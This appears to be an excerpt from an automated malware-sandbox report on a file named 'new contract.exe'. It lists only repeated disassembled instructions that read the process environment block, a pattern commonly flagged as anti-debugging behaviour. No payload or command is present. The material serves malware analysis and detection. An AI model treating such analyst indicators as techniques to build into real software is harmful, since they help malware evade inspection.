          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h]2_2_016D0274
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h]2_2_016D0274
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D0274 mov eax, dword ptr fs:[00000030h]2_2_016D0274
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A8243 mov eax, dword ptr fs:[00000030h]2_2_016A8243
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A8243 mov ecx, dword ptr fs:[00000030h]2_2_016A8243
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161A250 mov eax, dword ptr fs:[00000030h]2_2_0161A250
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F625D mov eax, dword ptr fs:[00000030h]2_2_016F625D
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01626259 mov eax, dword ptr fs:[00000030h]2_2_01626259
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016DA250 mov eax, dword ptr fs:[00000030h]2_2_016DA250
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016DA250 mov eax, dword ptr fs:[00000030h]2_2_016DA250
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161823B mov eax, dword ptr fs:[00000030h]2_2_0161823B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016302E1 mov eax, dword ptr fs:[00000030h]2_2_016302E1
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016302E1 mov eax, dword ptr fs:[00000030h]2_2_016302E1
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016302E1 mov eax, dword ptr fs:[00000030h]2_2_016302E1
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A2C3 mov eax, dword ptr fs:[00000030h]2_2_0162A2C3
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A2C3 mov eax, dword ptr fs:[00000030h]2_2_0162A2C3
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A2C3 mov eax, dword ptr fs:[00000030h]2_2_0162A2C3
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A2C3 mov eax, dword ptr fs:[00000030h]2_2_0162A2C3
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A2C3 mov eax, dword ptr fs:[00000030h]2_2_0162A2C3
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F62D6 mov eax, dword ptr fs:[00000030h]2_2_016F62D6
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016302A0 mov eax, dword ptr fs:[00000030h]2_2_016302A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016302A0 mov eax, dword ptr fs:[00000030h]2_2_016302A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B62A0 mov eax, dword ptr fs:[00000030h]2_2_016B62A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B62A0 mov ecx, dword ptr fs:[00000030h]2_2_016B62A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B62A0 mov eax, dword ptr fs:[00000030h]2_2_016B62A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B62A0 mov eax, dword ptr fs:[00000030h]2_2_016B62A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B62A0 mov eax, dword ptr fs:[00000030h]2_2_016B62A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B62A0 mov eax, dword ptr fs:[00000030h]2_2_016B62A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E284 mov eax, dword ptr fs:[00000030h]2_2_0165E284
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E284 mov eax, dword ptr fs:[00000030h]2_2_0165E284
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A0283 mov eax, dword ptr fs:[00000030h]2_2_016A0283
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A0283 mov eax, dword ptr fs:[00000030h]2_2_016A0283
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A0283 mov eax, dword ptr fs:[00000030h]2_2_016A0283
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165656A mov eax, dword ptr fs:[00000030h]2_2_0165656A
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165656A mov eax, dword ptr fs:[00000030h]2_2_0165656A
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165656A mov eax, dword ptr fs:[00000030h]2_2_0165656A
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01628550 mov eax, dword ptr fs:[00000030h]2_2_01628550
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01628550 mov eax, dword ptr fs:[00000030h]2_2_01628550
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630535 mov eax, dword ptr fs:[00000030h]2_2_01630535
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630535 mov eax, dword ptr fs:[00000030h]2_2_01630535
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630535 mov eax, dword ptr fs:[00000030h]2_2_01630535
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630535 mov eax, dword ptr fs:[00000030h]2_2_01630535
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630535 mov eax, dword ptr fs:[00000030h]2_2_01630535
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630535 mov eax, dword ptr fs:[00000030h]2_2_01630535
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E53E mov eax, dword ptr fs:[00000030h]2_2_0164E53E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E53E mov eax, dword ptr fs:[00000030h]2_2_0164E53E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E53E mov eax, dword ptr fs:[00000030h]2_2_0164E53E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E53E mov eax, dword ptr fs:[00000030h]2_2_0164E53E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E53E mov eax, dword ptr fs:[00000030h]2_2_0164E53E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B6500 mov eax, dword ptr fs:[00000030h]2_2_016B6500
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h]2_2_016F4500
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h]2_2_016F4500
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h]2_2_016F4500
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h]2_2_016F4500
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h]2_2_016F4500
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h]2_2_016F4500
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h]2_2_016F4500
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016225E0 mov eax, dword ptr fs:[00000030h]2_2_016225E0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h]2_2_0164E5E7
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h]2_2_0164E5E7
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h]2_2_0164E5E7
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h]2_2_0164E5E7
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h]2_2_0164E5E7
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h]2_2_0164E5E7
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h]2_2_0164E5E7
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h]2_2_0164E5E7
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165C5ED mov eax, dword ptr fs:[00000030h]2_2_0165C5ED
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165C5ED mov eax, dword ptr fs:[00000030h]2_2_0165C5ED
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E5CF mov eax, dword ptr fs:[00000030h]2_2_0165E5CF
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E5CF mov eax, dword ptr fs:[00000030h]2_2_0165E5CF
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016265D0 mov eax, dword ptr fs:[00000030h]2_2_016265D0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165A5D0 mov eax, dword ptr fs:[00000030h]2_2_0165A5D0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165A5D0 mov eax, dword ptr fs:[00000030h]2_2_0165A5D0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A05A7 mov eax, dword ptr fs:[00000030h]2_2_016A05A7
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A05A7 mov eax, dword ptr fs:[00000030h]2_2_016A05A7
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A05A7 mov eax, dword ptr fs:[00000030h]2_2_016A05A7
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016445B1 mov eax, dword ptr fs:[00000030h]2_2_016445B1
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016445B1 mov eax, dword ptr fs:[00000030h]2_2_016445B1
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01622582 mov eax, dword ptr fs:[00000030h]2_2_01622582
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01622582 mov ecx, dword ptr fs:[00000030h]2_2_01622582
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01654588 mov eax, dword ptr fs:[00000030h]2_2_01654588
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E59C mov eax, dword ptr fs:[00000030h]2_2_0165E59C
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016AC460 mov ecx, dword ptr fs:[00000030h]2_2_016AC460
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164A470 mov eax, dword ptr fs:[00000030h]2_2_0164A470
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164A470 mov eax, dword ptr fs:[00000030h]2_2_0164A470
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164A470 mov eax, dword ptr fs:[00000030h]2_2_0164A470
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h]2_2_0165E443
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h]2_2_0165E443
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h]2_2_0165E443
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h]2_2_0165E443
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h]2_2_0165E443
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h]2_2_0165E443
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h]2_2_0165E443
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h]2_2_0165E443
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016DA456 mov eax, dword ptr fs:[00000030h]2_2_016DA456
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161645D mov eax, dword ptr fs:[00000030h]2_2_0161645D
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164245A mov eax, dword ptr fs:[00000030h]2_2_0164245A
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161E420 mov eax, dword ptr fs:[00000030h]2_2_0161E420
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161E420 mov eax, dword ptr fs:[00000030h]2_2_0161E420
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161E420 mov eax, dword ptr fs:[00000030h]2_2_0161E420
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161C427 mov eax, dword ptr fs:[00000030h]2_2_0161C427
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h]2_2_016A6420
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h]2_2_016A6420
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h]2_2_016A6420
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h]2_2_016A6420
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h]2_2_016A6420
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h]2_2_016A6420
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h]2_2_016A6420
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01658402 mov eax, dword ptr fs:[00000030h]2_2_01658402
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01658402 mov eax, dword ptr fs:[00000030h]2_2_01658402
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01658402 mov eax, dword ptr fs:[00000030h]2_2_01658402
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016204E5 mov ecx, dword ptr fs:[00000030h]2_2_016204E5
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016264AB mov eax, dword ptr fs:[00000030h]2_2_016264AB
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016544B0 mov ecx, dword ptr fs:[00000030h]2_2_016544B0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016AA4B0 mov eax, dword ptr fs:[00000030h]2_2_016AA4B0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016DA49A mov eax, dword ptr fs:[00000030h]2_2_016DA49A
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01628770 mov eax, dword ptr fs:[00000030h]2_2_01628770
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630770 mov eax, dword ptr fs:[00000030h]2_2_01630770
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630770 mov eax, dword ptr fs:[00000030h]2_2_01630770
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630770 mov eax, dword ptr fs:[00000030h]2_2_01630770
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630770 mov eax, dword ptr fs:[00000030h]2_2_01630770
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630770 mov eax, dword ptr fs:[00000030h]2_2_01630770
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630770 mov eax, dword ptr fs:[00000030h]2_2_01630770
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630770 mov eax, dword ptr fs:[00000030h]2_2_01630770
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630770 mov eax, dword ptr fs:[00000030h]2_2_01630770
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630770 mov eax, dword ptr fs:[00000030h]2_2_01630770
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630770 mov eax, dword ptr fs:[00000030h]2_2_01630770
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630770 mov eax, dword ptr fs:[00000030h]2_2_01630770
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630770 mov eax, dword ptr fs:[00000030h]2_2_01630770
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165674D mov esi, dword ptr fs:[00000030h]2_2_0165674D
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165674D mov eax, dword ptr fs:[00000030h]2_2_0165674D
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165674D mov eax, dword ptr fs:[00000030h]2_2_0165674D
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01620750 mov eax, dword ptr fs:[00000030h]2_2_01620750
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662750 mov eax, dword ptr fs:[00000030h]2_2_01662750
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662750 mov eax, dword ptr fs:[00000030h]2_2_01662750
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016AE75D mov eax, dword ptr fs:[00000030h]2_2_016AE75D
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A4755 mov eax, dword ptr fs:[00000030h]2_2_016A4755
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165C720 mov eax, dword ptr fs:[00000030h]2_2_0165C720
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165C720 mov eax, dword ptr fs:[00000030h]2_2_0165C720
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165273C mov eax, dword ptr fs:[00000030h]2_2_0165273C
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165273C mov ecx, dword ptr fs:[00000030h]2_2_0165273C
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165273C mov eax, dword ptr fs:[00000030h]2_2_0165273C
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0169C730 mov eax, dword ptr fs:[00000030h]2_2_0169C730
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165C700 mov eax, dword ptr fs:[00000030h]2_2_0165C700
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01620710 mov eax, dword ptr fs:[00000030h]2_2_01620710
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01650710 mov eax, dword ptr fs:[00000030h]2_2_01650710
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016427ED mov eax, dword ptr fs:[00000030h]2_2_016427ED
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016427ED mov eax, dword ptr fs:[00000030h]2_2_016427ED
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016427ED mov eax, dword ptr fs:[00000030h]2_2_016427ED
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016AE7E1 mov eax, dword ptr fs:[00000030h]2_2_016AE7E1
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016247FB mov eax, dword ptr fs:[00000030h]2_2_016247FB
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016247FB mov eax, dword ptr fs:[00000030h]2_2_016247FB
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162C7C0 mov eax, dword ptr fs:[00000030h]2_2_0162C7C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A07C3 mov eax, dword ptr fs:[00000030h]2_2_016A07C3
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016207AF mov eax, dword ptr fs:[00000030h]2_2_016207AF
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016D47A0 mov eax, dword ptr fs:[00000030h]2_2_016D47A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016C678E mov eax, dword ptr fs:[00000030h]2_2_016C678E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016E866E mov eax, dword ptr fs:[00000030h]2_2_016E866E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016E866E mov eax, dword ptr fs:[00000030h]2_2_016E866E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165A660 mov eax, dword ptr fs:[00000030h]2_2_0165A660
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165A660 mov eax, dword ptr fs:[00000030h]2_2_0165A660
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01652674 mov eax, dword ptr fs:[00000030h]2_2_01652674
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163C640 mov eax, dword ptr fs:[00000030h]2_2_0163C640
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163E627 mov eax, dword ptr fs:[00000030h]2_2_0163E627
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01656620 mov eax, dword ptr fs:[00000030h]2_2_01656620
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01658620 mov eax, dword ptr fs:[00000030h]2_2_01658620
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162262C mov eax, dword ptr fs:[00000030h]2_2_0162262C
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0169E609 mov eax, dword ptr fs:[00000030h]2_2_0169E609
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163260B mov eax, dword ptr fs:[00000030h]2_2_0163260B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163260B mov eax, dword ptr fs:[00000030h]2_2_0163260B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163260B mov eax, dword ptr fs:[00000030h]2_2_0163260B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163260B mov eax, dword ptr fs:[00000030h]2_2_0163260B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163260B mov eax, dword ptr fs:[00000030h]2_2_0163260B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163260B mov eax, dword ptr fs:[00000030h]2_2_0163260B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0163260B mov eax, dword ptr fs:[00000030h]2_2_0163260B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01662619 mov eax, dword ptr fs:[00000030h]2_2_01662619
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0169E6F2 mov eax, dword ptr fs:[00000030h]2_2_0169E6F2
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0169E6F2 mov eax, dword ptr fs:[00000030h]2_2_0169E6F2
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0169E6F2 mov eax, dword ptr fs:[00000030h]2_2_0169E6F2
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0169E6F2 mov eax, dword ptr fs:[00000030h]2_2_0169E6F2
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A06F1 mov eax, dword ptr fs:[00000030h]2_2_016A06F1
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A06F1 mov eax, dword ptr fs:[00000030h]2_2_016A06F1
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0165A6C7
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165A6C7 mov eax, dword ptr fs:[00000030h]2_2_0165A6C7
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165C6A6 mov eax, dword ptr fs:[00000030h]2_2_0165C6A6
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016566B0 mov eax, dword ptr fs:[00000030h]2_2_016566B0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01624690 mov eax, dword ptr fs:[00000030h]2_2_01624690
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01624690 mov eax, dword ptr fs:[00000030h]2_2_01624690
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01646962 mov eax, dword ptr fs:[00000030h]2_2_01646962
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01646962 mov eax, dword ptr fs:[00000030h]2_2_01646962
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01646962 mov eax, dword ptr fs:[00000030h]2_2_01646962
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0166096E mov eax, dword ptr fs:[00000030h]2_2_0166096E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0166096E mov edx, dword ptr fs:[00000030h]2_2_0166096E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0166096E mov eax, dword ptr fs:[00000030h]2_2_0166096E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016C4978 mov eax, dword ptr fs:[00000030h]2_2_016C4978
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016C4978 mov eax, dword ptr fs:[00000030h]2_2_016C4978
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016AC97C mov eax, dword ptr fs:[00000030h]2_2_016AC97C
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A0946 mov eax, dword ptr fs:[00000030h]2_2_016A0946
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F4940 mov eax, dword ptr fs:[00000030h]2_2_016F4940
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A892A mov eax, dword ptr fs:[00000030h]2_2_016A892A
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B892B mov eax, dword ptr fs:[00000030h]2_2_016B892B
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0169E908 mov eax, dword ptr fs:[00000030h]2_2_0169E908
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0169E908 mov eax, dword ptr fs:[00000030h]2_2_0169E908
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016AC912 mov eax, dword ptr fs:[00000030h]2_2_016AC912
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01618918 mov eax, dword ptr fs:[00000030h]2_2_01618918
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01618918 mov eax, dword ptr fs:[00000030h]2_2_01618918
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016AE9E0 mov eax, dword ptr fs:[00000030h]2_2_016AE9E0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016529F9 mov eax, dword ptr fs:[00000030h]2_2_016529F9
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016529F9 mov eax, dword ptr fs:[00000030h]2_2_016529F9
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B69C0 mov eax, dword ptr fs:[00000030h]2_2_016B69C0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A9D0 mov eax, dword ptr fs:[00000030h]2_2_0162A9D0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A9D0 mov eax, dword ptr fs:[00000030h]2_2_0162A9D0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A9D0 mov eax, dword ptr fs:[00000030h]2_2_0162A9D0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A9D0 mov eax, dword ptr fs:[00000030h]2_2_0162A9D0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A9D0 mov eax, dword ptr fs:[00000030h]2_2_0162A9D0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0162A9D0 mov eax, dword ptr fs:[00000030h]2_2_0162A9D0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016549D0 mov eax, dword ptr fs:[00000030h]2_2_016549D0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016EA9D3 mov eax, dword ptr fs:[00000030h]2_2_016EA9D3
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h]2_2_016329A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h]2_2_016329A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h]2_2_016329A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h]2_2_016329A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h]2_2_016329A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h]2_2_016329A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h]2_2_016329A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h]2_2_016329A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h]2_2_016329A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h]2_2_016329A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016329A0 mov eax, dword ptr fs:[00000030h]2_2_016329A0
